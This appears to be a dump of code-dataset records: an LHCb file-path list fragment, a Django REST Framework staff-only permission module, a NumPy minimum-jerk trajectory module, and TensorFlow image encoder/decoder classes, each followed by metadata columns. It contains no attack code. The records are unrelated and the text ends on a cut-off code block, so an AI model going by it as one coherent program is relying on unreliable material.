'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000013_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000014_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000015_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000016_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000017_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000018_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000019_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000020_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000021_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000022_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000023_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000024_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000025_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000026_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000027_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000028_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000029_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000030_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000031_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000032_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000033_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000034_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000035_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000036_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000037_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000038_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000039_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000040_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000041_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000042_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000043_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000044_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000045_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000046_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000047_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000048_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000049_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000050_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000051_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000052_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000053_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000054_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000055_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000056_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000057_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000058_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000059_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000060_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000061_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000062_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000063_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000064_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000065_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000066_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000067_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000068_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000069_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000070_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000071_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000072_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000073_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000074_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000075_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000076_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000077_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000078_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000079_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000080_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000081_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000082_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000083_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000084_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000085_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000086_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000087_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000088_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000089_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000090_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000091_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000092_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000093_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000094_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000095_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000096_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000097_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000098_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000099_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000100_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000101_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000102_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000103_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000104_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000105_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000106_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000107_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000108_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000109_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000110_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000111_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000112_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000113_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000114_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000115_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000116_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000117_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000118_1.allstreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00035988/0000/00035988_00000119_1.allstreams.dst'
], clear=True)
| 66.092308 | 247 | 0.802607 | 1,833 | 12,888 | 5.511729 | 0.135843 | 0.306246 | 0.106008 | 0.153123 | 0.76215 | 0.759576 | 0.759576 | 0.759576 | 0.754825 | 0.750272 | 0 | 0.336859 | 0.039029 | 12,888 | 194 | 248 | 66.43299 | 0.478886 | 0.19685 | 0 | 0 | 1 | 0.97541 | 0.936577 | 0.936189 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.016393 | 0 | 0.016393 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
acdf9e2ab3ff4ca175712f256961372f619e18d8 | 700 | py | Python | accounts/permissions.py | OnzeGgaaziFlow/EnvironmentMate-Backend | 39b18c1a3ac4f0dc3266b85ce70c195e6693989e | [
"MIT"
] | 1 | 2022-02-13T13:51:13.000Z | 2022-02-13T13:51:13.000Z | accounts/permissions.py | OnzeGgaaziFlow/EnvironmentMate-Backend | 39b18c1a3ac4f0dc3266b85ce70c195e6693989e | [
"MIT"
] | null | null | null | accounts/permissions.py | OnzeGgaaziFlow/EnvironmentMate-Backend | 39b18c1a3ac4f0dc3266b85ce70c195e6693989e | [
"MIT"
] | null | null | null | from rest_framework import permissions
class OnlyCanSeeAdminUser(permissions.BasePermission):
    def has_permission(self, request, view):
        if view.action == "list":
            return bool(request.user.is_staff)
        return super().has_permission(request, view)
class OnlyCanAcceptAdminUser(permissions.BasePermission):
    def has_permission(self, request, view):
        if view.action == "create":
            return bool(request.user.is_staff)
        return super().has_permission(request, view)
| 29.166667 | 57 | 0.591429 | 69 | 700 | 5.898551 | 0.391304 | 0.127764 | 0.137592 | 0.152334 | 0.766585 | 0.766585 | 0.766585 | 0.766585 | 0.766585 | 0.766585 | 0 | 0 | 0.328571 | 700 | 23 | 58 | 30.434783 | 0.865957 | 0 | 0 | 0.736842 | 0 | 0 | 0.014286 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.052632 | 0 | 0.578947 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
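The two permission classes above gate a single ViewSet action (`list` or `create`) on `request.user.is_staff` and defer everything else to `BasePermission`. A framework-free sketch of that action-gating pattern, runnable without Django installed (the `User`, `Request`, and `View` stand-ins are hypothetical stubs mimicking the DRF objects):

```python
# Minimal stand-ins for DRF's BasePermission / request / viewset objects.
class BasePermission:
    def has_permission(self, request, view):
        # DRF's BasePermission also defaults to allowing access.
        return True

class OnlyCanSeeAdminUser(BasePermission):
    def has_permission(self, request, view):
        if view.action == "list":
            return bool(request.user.is_staff)
        return super().has_permission(request, view)

class User:
    def __init__(self, is_staff):
        self.is_staff = is_staff

class Request:
    def __init__(self, user):
        self.user = user

class View:
    def __init__(self, action):
        self.action = action

perm = OnlyCanSeeAdminUser()
print(perm.has_permission(Request(User(is_staff=True)), View("list")))      # True
print(perm.has_permission(Request(User(is_staff=False)), View("list")))     # False
print(perm.has_permission(Request(User(is_staff=False)), View("retrieve"))) # True
```

Non-staff users are only blocked on the gated action; all other actions fall through to the base class.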
c5ca0dbd25ad4c215cf83acc12eb5015981e8928 | 3,710 | py | Python | src/ellie_arm/ellie_arm/dynamixel/trajectory.py | Gin-TrungSon/EllieHumanoid | c5d958663149dad23cc1cbce7e5884eddf079792 | [
"MIT"
] | null | null | null | src/ellie_arm/ellie_arm/dynamixel/trajectory.py | Gin-TrungSon/EllieHumanoid | c5d958663149dad23cc1cbce7e5884eddf079792 | [
"MIT"
] | null | null | null | src/ellie_arm/ellie_arm/dynamixel/trajectory.py | Gin-TrungSon/EllieHumanoid | c5d958663149dad23cc1cbce7e5884eddf079792 | [
"MIT"
] | 1 | 2021-12-09T13:39:14.000Z | 2021-12-09T13:39:14.000Z | import numpy as np
import collections.abc
class MinimumJerkTrajectory(object):
def __init__(self, initial, final, duration, init_vel=0.0, init_acc=0.0, final_vel=0.0, final_acc=0.0):
self.initial = initial
self.final = final
self.duration = duration
self.init_vel = init_vel
self.init_acc = init_acc
self.final_vel = final_vel
self.final_acc = final_acc
self.durations = [0, duration]
self.finals = [final]
self.compute()
def compute(self):
a0 = self.initial
a1 = self.init_vel
a2 = self.init_acc / 2.0
def d(x): return self.duration ** x
A = np.array([[d(3), d(4), d(5)], [3 * d(2), 4 * d(3),
5 * d(4)], [6 * d(1), 12 * d(2), 20 * d(3)]])
B = np.array([self.final - a0 - (a1 * d(1)) - (a2 * d(2)),
self.final_vel - a1 - (2 * a2 * d(1)), self.final_acc - (2 * a2)])
X = np.linalg.solve(A, B)
self.other_gen = None
self._mylambda = lambda x: a0 + a1 * x + a2 * x ** 2 + \
X[0] * x ** 3 + X[1] * x ** 4 + X[2] * x ** 5
self._generators = [self._mylambda]
def get_value(self, t):
        return self._generators[-1](t)
def domain(self, x):
        if not isinstance(x, collections.abc.Iterable):
x = np.array([x])
return np.array([
self.durations[0] <= xi < self.durations[1]
for xi in x
])
def test_domain(self, x):
return [((np.array(x) >= self.durations[i])) for i in range(len(self.durations) - 1)]
def fix_input(self, x):
        return x if isinstance(x, collections.abc.Iterable) else np.array([0, x])
def get_generator(self):
return lambda x: np.piecewise(x, self.domain(x), [self._generators[j] for j in range(len(self._generators))] + [self.finals[-1]])
# NOTE: SinusTrajectory is currently byte-for-byte identical to
# MinimumJerkTrajectory; a sinusoidal profile has not been implemented yet.
class SinusTrajectory(object):
def __init__(self, initial, final, duration, init_vel=0.0, init_acc=0.0, final_vel=0.0, final_acc=0.0):
self.initial = initial
self.final = final
self.duration = duration
self.init_vel = init_vel
self.init_acc = init_acc
self.final_vel = final_vel
self.final_acc = final_acc
self.durations = [0, duration]
self.finals = [final]
self.compute()
def compute(self):
a0 = self.initial
a1 = self.init_vel
a2 = self.init_acc / 2.0
def d(x): return self.duration ** x
A = np.array([[d(3), d(4), d(5)], [3 * d(2), 4 * d(3),
5 * d(4)], [6 * d(1), 12 * d(2), 20 * d(3)]])
B = np.array([self.final - a0 - (a1 * d(1)) - (a2 * d(2)),
self.final_vel - a1 - (2 * a2 * d(1)), self.final_acc - (2 * a2)])
X = np.linalg.solve(A, B)
self.other_gen = None
self._mylambda = lambda x: a0 + a1 * x + a2 * x ** 2 + \
X[0] * x ** 3 + X[1] * x ** 4 + X[2] * x ** 5
self._generators = [self._mylambda]
def get_value(self, t):
        return self._generators[-1](t)
def domain(self, x):
        if not isinstance(x, collections.abc.Iterable):
x = np.array([x])
return np.array([
self.durations[0] <= xi < self.durations[1]
for xi in x
])
def test_domain(self, x):
return [((np.array(x) >= self.durations[i])) for i in range(len(self.durations) - 1)]
def fix_input(self, x):
        return x if isinstance(x, collections.abc.Iterable) else np.array([0, x])
def get_generator(self):
return lambda x: np.piecewise(x, self.domain(x), [self._generators[j] for j in range(len(self._generators))] + [self.finals[-1]])
| 32.26087 | 137 | 0.534771 | 556 | 3,710 | 3.456835 | 0.122302 | 0.056191 | 0.010406 | 0.062435 | 0.959417 | 0.959417 | 0.959417 | 0.959417 | 0.959417 | 0.959417 | 0 | 0.045207 | 0.308356 | 3,710 | 114 | 138 | 32.54386 | 0.703819 | 0 | 0 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.190476 | false | 0 | 0.02381 | 0.119048 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 8 |
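`MinimumJerkTrajectory.compute()` fixes the first three quintic coefficients from the initial position, velocity, and acceleration, then solves a 3x3 linear system for the remaining three so the final boundary conditions hold. A standalone sketch of that fit (function name `minimum_jerk` is mine, but the `A`/`B` system mirrors `compute()` exactly):

```python
import numpy as np

def minimum_jerk(initial, final, T, init_vel=0.0, init_acc=0.0,
                 final_vel=0.0, final_acc=0.0):
    # a0..a2 come directly from the initial conditions.
    a0, a1, a2 = initial, init_vel, init_acc / 2.0
    d = lambda n: T ** n
    # Position / velocity / acceleration constraints at t = T.
    A = np.array([[d(3), d(4), d(5)],
                  [3 * d(2), 4 * d(3), 5 * d(4)],
                  [6 * d(1), 12 * d(2), 20 * d(3)]])
    B = np.array([final - a0 - a1 * d(1) - a2 * d(2),
                  final_vel - a1 - 2 * a2 * d(1),
                  final_acc - 2 * a2])
    a3, a4, a5 = np.linalg.solve(A, B)
    return lambda t: (a0 + a1 * t + a2 * t ** 2
                      + a3 * t ** 3 + a4 * t ** 4 + a5 * t ** 5)

traj = minimum_jerk(initial=0.0, final=10.0, T=2.0)
print(round(traj(0.0), 6))  # 0.0  -- starts at `initial`
print(round(traj(2.0), 6))  # 10.0 -- ends at `final`
print(round(traj(1.0), 6))  # 5.0  -- symmetric midpoint for zero boundary vel/acc
```

With zero boundary velocity and acceleration this reduces to the classic 10t³-15t⁴+6t⁵ minimum-jerk profile.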
c5f0272e1bef0acd759d606fb9e7669282573a8a | 8,058 | py | Python | codas/train/img_codec.py | xionghuichen/CODAS | 1bd0109ba11936c2de69b6b5876b15fb8be17508 | [
"MIT"
] | 6 | 2021-12-10T00:11:20.000Z | 2022-03-18T07:01:34.000Z | codas/train/img_codec.py | xionghuichen/CODAS | 1bd0109ba11936c2de69b6b5876b15fb8be17508 | [
"MIT"
] | 1 | 2021-12-20T21:28:02.000Z | 2021-12-21T14:16:01.000Z | codas/train/img_codec.py | xionghuichen/CODAS | 1bd0109ba11936c2de69b6b5876b15fb8be17508 | [
"MIT"
] | 2 | 2022-01-12T14:19:34.000Z | 2022-03-11T07:38:10.000Z | # Copyright 2019 The PlaNet Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import tensorflow as tf
from codas.utils.tf_basic import TfBasicClass
from codas.utils import tf_util
class Encoder(TfBasicClass):
def __init__(self, scope='encoder', stack_imgs=0):
TfBasicClass.__init__(self, scope, )
self.stack_imgs = stack_imgs
def _obj_construct(self, imgs, *args, **kwargs):
"""Extract deterministic features from an observation."""
kwargs = dict(strides=2, activation=tf.nn.relu)
ndims = imgs.get_shape().ndims
if ndims == 5: # [batch, horizon, h, w, c]
if imgs.shape[1] == 1 or self.stack_imgs == 1:
stack_imgs = imgs
else:
# padding zeros
def stack_idx(idx):
pre_pad_img = tf.zeros([tf.shape(imgs)[0], idx] + imgs.shape[2:].as_list(), dtype=imgs.dtype)
post_pad_img = tf.zeros([tf.shape(imgs)[0], self.stack_imgs - 1 - idx] + imgs.shape[2:].as_list(), dtype=imgs.dtype)
stacked_imgs = tf.concat([pre_pad_img, imgs, post_pad_img], axis=1)
return stacked_imgs
idx_list = tuple(list(range(self.stack_imgs)))
st_imgs = list(map(stack_idx, idx_list))
stack_imgs = tf.concat(st_imgs, axis=-1)[:, :-1 * (self.stack_imgs - 1)]
hidden = tf.reshape(stack_imgs, [-1] + stack_imgs.shape[2:].as_list())
elif ndims == 4:
stack_imgs = imgs
hidden = imgs
else:
            raise NotImplementedError('Encoder expects 4-D or 5-D image tensors')
hidden = tf.layers.conv2d(hidden, 32, 4, name='enc_conv1', **kwargs)
hidden = tf.layers.conv2d(hidden, 64, 4, name='enc_conv2', **kwargs)
hidden = tf.layers.conv2d(hidden, 128, 4, name='enc_conv3', **kwargs)
hidden = tf.layers.conv2d(hidden, 256, 4, name='enc_conv4', **kwargs)
hidden = tf.layers.flatten(hidden)
assert hidden.shape[1:].as_list() == [1024], hidden.shape.as_list()
# hidden = tf.layers.dense(hidden, 128, None, name='enc_fc5')
if ndims == 5:
hidden = tf.reshape(hidden, tf_util.shape(stack_imgs)[:2] + [
np.prod(hidden.shape[1:].as_list())])
return hidden
class LargeEncoder(TfBasicClass):
def __init__(self, scope='encoder', stack_imgs=0):
TfBasicClass.__init__(self, scope, )
self.stack_imgs = stack_imgs
def _obj_construct(self, imgs, *args, **kwargs):
"""Extract deterministic features from an observation."""
kwargs = dict(strides=2, activation=tf.nn.relu)
ndims = imgs.get_shape().ndims
if ndims == 5: # [batch, horizon, h, w, c]
if imgs.shape[1] == 1 or self.stack_imgs == 1:
stack_imgs = imgs
else:
# padding zeros
def stack_idx(idx):
pre_pad_img = tf.zeros([tf.shape(imgs)[0], idx] + imgs.shape[2:].as_list(), dtype=imgs.dtype)
post_pad_img = tf.zeros([tf.shape(imgs)[0], self.stack_imgs - 1 - idx] + imgs.shape[2:].as_list(), dtype=imgs.dtype)
stacked_imgs = tf.concat([pre_pad_img, imgs, post_pad_img], axis=1)
return stacked_imgs
idx_list = tuple(list(range(self.stack_imgs)))
st_imgs = list(map(stack_idx, idx_list))
stack_imgs = tf.concat(st_imgs, axis=-1)[:, :-1 * (self.stack_imgs - 1)]
hidden = tf.reshape(stack_imgs, [-1] + stack_imgs.shape[2:].as_list())
elif ndims == 4:
stack_imgs = imgs
hidden = imgs
else:
            raise NotImplementedError('LargeEncoder expects 4-D or 5-D image tensors')
hidden = tf.layers.conv2d(hidden, 64, 4, name='enc_conv1', **kwargs)
hidden = tf.layers.conv2d(hidden, 128, 4, name='enc_conv2', **kwargs)
hidden = tf.layers.conv2d(hidden, 256, 4, name='enc_conv3', **kwargs)
hidden = tf.layers.conv2d(hidden, 512, 4, name='enc_conv4', **kwargs)
hidden = tf.layers.conv2d(hidden, 512, 4, name='enc_conv5', **kwargs)
hidden = tf.layers.flatten(hidden)
hidden = tf.layers.dense(hidden, 1024, activation=tf.nn.relu)
assert hidden.shape[1:].as_list() == [1024], hidden.shape.as_list()
# hidden = tf.layers.dense(hidden, 128, None, name='enc_fc5')
if ndims == 5:
hidden = tf.reshape(hidden, tf_util.shape(stack_imgs)[:2] + [
np.prod(hidden.shape[1:].as_list())])
return hidden
class Decoder(TfBasicClass):
    """Compute the data distribution of an observation from its state."""
    def __init__(self, scope='decoder'):
        TfBasicClass.__init__(self, scope)
def _obj_construct(self, source_input, *args, **kwargs):
state, data_shape = source_input
final_channel = data_shape[2]
net_kwargs = dict(strides=2, activation=tf.nn.relu)
hidden = tf.layers.dense(state, 1024, None, name='dec_fc1')
hidden = tf.layers.dense(hidden, 2048, activation=tf.nn.relu, name='dec_fc2')
hidden = tf.reshape(hidden, [-1, 1, 1, hidden.shape[-1].value])
hidden = tf.layers.conv2d_transpose(hidden, 128, 5, name='dec_conv1', **net_kwargs)
hidden = tf.layers.conv2d_transpose(hidden, 64, 5, name='dec_conv2', **net_kwargs)
hidden = tf.layers.conv2d_transpose(hidden, 32, 6, name='dec_conv3', **net_kwargs)
mean = tf.layers.conv2d_transpose(hidden, final_channel, 6, strides=2, name='dec_conv4')
mean = tf.reshape(mean, tf_util.shape(state)[:-1] + data_shape)
return mean
class LargeDecoder(TfBasicClass):
    """Compute the data distribution of an observation from its state."""
    def __init__(self, scope='decoder'):
        TfBasicClass.__init__(self, scope)
def _obj_construct(self, source_input, *args, **kwargs):
state, data_shape = source_input
final_channel = data_shape[2]
net_kwargs = dict(strides=2, activation=tf.nn.relu)
hidden = tf.layers.dense(state, 1024, None, name='dec_fc1')
hidden = tf.layers.dense(hidden, 2048, None, name='dec_fc2')
hidden = tf.reshape(hidden, [-1, 1, 1, hidden.shape[-1].value])
hidden = tf.layers.conv2d_transpose(hidden, 256, 5, name='dec_conv1', **net_kwargs)
hidden = tf.layers.conv2d_transpose(hidden, 128, 5, name='dec_conv2', **net_kwargs)
hidden = tf.layers.conv2d_transpose(hidden, 64, 5, name='dec_conv3', **net_kwargs)
hidden = tf.layers.conv2d_transpose(hidden, 32, 6, name='dec_conv4', **net_kwargs)
mean = tf.layers.conv2d_transpose(hidden, final_channel, 6, strides=2, name='dec_conv5')
mean = tf.reshape(mean, tf_util.shape(state)[:-1] + data_shape)
return mean
| 49.740741 | 137 | 0.619509 | 1,086 | 8,058 | 4.436464 | 0.161142 | 0.054795 | 0.072644 | 0.066418 | 0.954961 | 0.947696 | 0.938149 | 0.938149 | 0.931922 | 0.931092 | 0 | 0.035073 | 0.253413 | 8,058 | 161 | 138 | 50.049689 | 0.765791 | 0.181435 | 0 | 0.733945 | 0 | 0 | 0.034863 | 0 | 0 | 0 | 0 | 0 | 0.018349 | 1 | 0.091743 | false | 0 | 0.036697 | 0 | 0.220183 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
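The `assert hidden.shape[1:].as_list() == [1024]` in `Encoder` implicitly assumes 64x64 input images: `tf.layers.conv2d` defaults to VALID padding, so four 4x4 stride-2 convolutions shrink each spatial side 64 -> 31 -> 14 -> 6 -> 2, and 2 x 2 x 256 channels flatten to 1024 features. The arithmetic, as a sketch:

```python
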